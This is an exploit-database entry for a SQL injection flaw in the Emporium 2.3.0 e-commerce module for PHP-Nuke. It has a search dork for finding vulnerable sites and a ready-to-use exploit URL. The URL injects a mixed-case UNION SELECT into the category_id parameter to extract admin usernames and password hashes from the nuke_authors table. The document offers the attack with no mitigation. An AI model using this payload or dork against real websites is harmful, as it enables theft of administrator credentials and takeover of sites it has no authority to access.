PHP-Nuke Module Emporium 2.3.0 (id_catg) SQL Injection Vulnerability

2009-12-23T00:00:00
ID 1337DAY-ID-10370
Type zdt
Reporter Hussin X
Modified 2009-12-23T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ====================================================================
PHP-Nuke Module Emporium 2.3.0 (id_catg) SQL Injection Vulnerability
====================================================================

||| PHP-Nuke Module Emporium 2.3.0 (id_catg) SQL Injection Vulnerability
||   Author: Hussin X
||| DorK   : inurl:modules.php?name=Shopping_Cart
||| more
 Module's Name: Emporium
 Module's Version: 2.3.0
 Module's Description: eCommerce for PHP-Nuke.
 License: Burnwave Emporium License
 Author's Name: Michael Squires
 Module's Download  http://www.burnwave.com/
 
 
 Exploit
________
 
http://server/modules.php?name=Shopping_Cart&file=category&category_id=4+uNioN+sElEcT+'IQ-SecuritY',aid,pwd+from+nuke_authors--



#  0day.today [2018-04-14]  #